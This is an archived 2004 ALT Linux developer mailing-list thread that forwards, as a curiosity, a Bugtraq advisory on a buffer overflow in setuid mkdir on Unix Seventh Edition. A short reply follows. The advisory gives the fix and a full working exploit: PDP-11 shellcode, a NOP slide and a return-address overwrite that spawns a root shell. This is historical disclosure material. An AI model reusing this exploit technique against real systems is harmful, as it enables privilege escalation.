ALT Linux Team development discussions
 help / color / mirror / Atom feed
* [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.]
@ 2004-06-03 15:29 Dmitry V. Levin
  2004-06-03 15:33 ` Alexey I. Froloff
  0 siblings, 1 reply; 2+ messages in thread
From: Dmitry V. Levin @ 2004-06-03 15:29 UTC (permalink / raw)
  To: ALT Devel discussion list

[-- Attachment #1: Type: text/plain, Size: 4202 bytes --]

На правах анекдота.

----- Forwarded message from Tim Newsham <newsham@lava.net> -----

Date: Wed, 2 Jun 2004 17:30:50 -1000 (HST)
From: Tim Newsham <newsham@lava.net>
To: bugtraq@securityfocus.com
Subject: Mkdir buffer overflow vulnerability in Unix Seventh Edition.


Mkdir buffer overflow vulnerability in Unix Seventh Edition.
2 Jun 2004


SYNOPSIS
    A vulnerability in the mkdir system utility can allow an
    unprivileged user to gain root privileges in UNIX 7th
    Edition systems.

DESCRIPTION
    The mkdir utility (/bin/mkdir) creates directories on behalf
    of the user.  Mkdir is granted root privileges through the
    set-user-id mechanism to allow it to create directories with
    the mknod system call.  Before making a subdirectory, mkdir first
    verifies that the path leading up to the new directory exists
    and that the user can access the directory.  In the process
    of performing these tests, mkdir copies a portion of the
    user supplied path into a fixed sized temporary buffer.
    This occurs in the function mkdir() (see /usr/src/cmd/mkdir.c).

    The mkdir() function first finds the position of the last path
    divider character ('/') in the provided path, and then copies
    all the data up to this point into the pname buffer.  Since
    the pname buffer is only 128 bytes long, and the user provided
    path can have a much longer length, a buffer overflow condition
    exists.

SOLUTION
    The fix to this problem is simple -- ensure that the provided
    path is no longer than the maximum path length.  This can be
    done by adding:

        if(strlen(d) >= 126) {
            fprintf(stderr, "mkdir: path is too long\n");
            ++Errors;
            return;
        }

    to the start of the mkdir() function.  Comparing with a value
    slightly less than the maximum path length ensures that the
    buffer is also large enough to contain the path to the "."
    link that is created later in the function.

EXPLOIT
    The following program exploits this problem on the PDP-11
    platform to run a shell with the effective user id of the
    superuser.

----
/*
 * Exploit for /bin/mkdir Unix V7 PDP-11.
 * mkdir has a buffer overflow when checking if the directory
 * in /arg/with/slashes/fname exists.
 *
 * This will run /bin/sh with euid 0, but not uid 0.  Since
 * the shell doesn't do anything special about this, we don't
 * really care.  If you care, run  setuid(0); execl("/bin/sh", 0);
 */

/*
.globl  _main
_main:
    mov  pc,r1
    sub  $-[sh-_main-2], r1             / pointer to sh
    mov  r1, r2
    sub  $-8, r2
    clrb -1(r2)                         / null terminate
    mov  r1, r2
    clr  -(r1)                          / char *env[] = {0}
    mov  r1, r3
    mov  r2, -(r1)                      / char *argv[] = {sh, 0}
    mov  r1, r4
    mov  r3, -(r1)                      / reverse of sh,argv,env
    mov  r4, -(r1)
    mov  r2, -(r1)
    sys  59.; 11111; 11111; 11111       / call execve
argv:   11111; 11111
sh:     </bin/sh>
*/

char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
    0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
    0102, 020, 041, 012, 0103, 020, 0241, 020,
    0104, 020, 0341, 020, 041, 021, 0241, 020,
    073, 0211, 0111, 022, 0111, 022, 0111, 022,
    0111, 022, 0111, 022, 057, 0142, 0151, 0156,
    057, 0163, 0150, 0 };

#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0

main(argc, argv)
    int argc;
    char **argv;
{
    char buf[400];
    int i;
    char *argv2[4];

    /* nop slide + egg */
    for(i = 0; i < NOPSLIDE; ) {
        buf[i++] = 0301;
        buf[i++] = 021;
    }
    strcpy(buf + i, egg);

    /* pad out to CNT */
    for(i = strlen(buf); i < CNT; i++)
        buf[i] = 'a';

    /* overwrite retaddr */
    buf[i++] = PC & 0xff;
    buf[i++] = PC >> 8;

    /* extra stuff */
    buf[i++] = '/';
    buf[i++] = 'a';
    buf[i++] = 0;

    argv2[0] = "/bin/mkdir";
    argv2[1] = buf;
    argv2[2] = 0;
    execv(argv2[0], argv2);
    return 0;
}

----- End forwarded message -----

-- 
ldv

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]

^ permalink raw reply	[flat|nested] 2+ messages in thread

* Re: [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.]
  2004-06-03 15:29 [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.] Dmitry V. Levin
@ 2004-06-03 15:33 ` Alexey I. Froloff
  0 siblings, 0 replies; 2+ messages in thread
From: Alexey I. Froloff @ 2004-06-03 15:33 UTC (permalink / raw)
  To: ALT Devel discussion list

[-- Attachment #1: Type: text/plain, Size: 328 bytes --]

* Dmitry V. Levin <ldv@> [040603 19:30]:
> На правах анекдота.
[..skip..]
>  * Exploit for /bin/mkdir Unix V7 PDP-11.

О!  А у меня есть Unix V7 PDP-11 под simh ;-)  Надо будет
проверить...

-- 
Regards, Sir Raorn.
-------------------
В каком дистрибутиве apt по-умолчанию настроен на Сизиф?
		-- zerg in sisyphus@

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]

^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2004-06-03 15:33 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2004-06-03 15:29 [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.] Dmitry V. Levin
2004-06-03 15:33 ` Alexey I. Froloff

ALT Linux Team development discussions

This inbox may be cloned and mirrored by anyone:

	git clone --mirror http://lore.altlinux.org/devel/0 devel/git/0.git

	# If you have public-inbox 1.1+ installed, you may
	# initialize and index your mirror using the following commands:
	public-inbox-init -V2 devel devel/ http://lore.altlinux.org/devel \
		devel@altlinux.org devel@altlinux.ru devel@lists.altlinux.org devel@lists.altlinux.ru devel@linux.iplabs.ru mandrake-russian@linuxteam.iplabs.ru sisyphus@linuxteam.iplabs.ru
	public-inbox-index devel

Example config snippet for mirrors.
Newsgroup available over NNTP:
	nntp://lore.altlinux.org/org.altlinux.lists.devel


AGPL code for this site: git clone https://public-inbox.org/public-inbox.git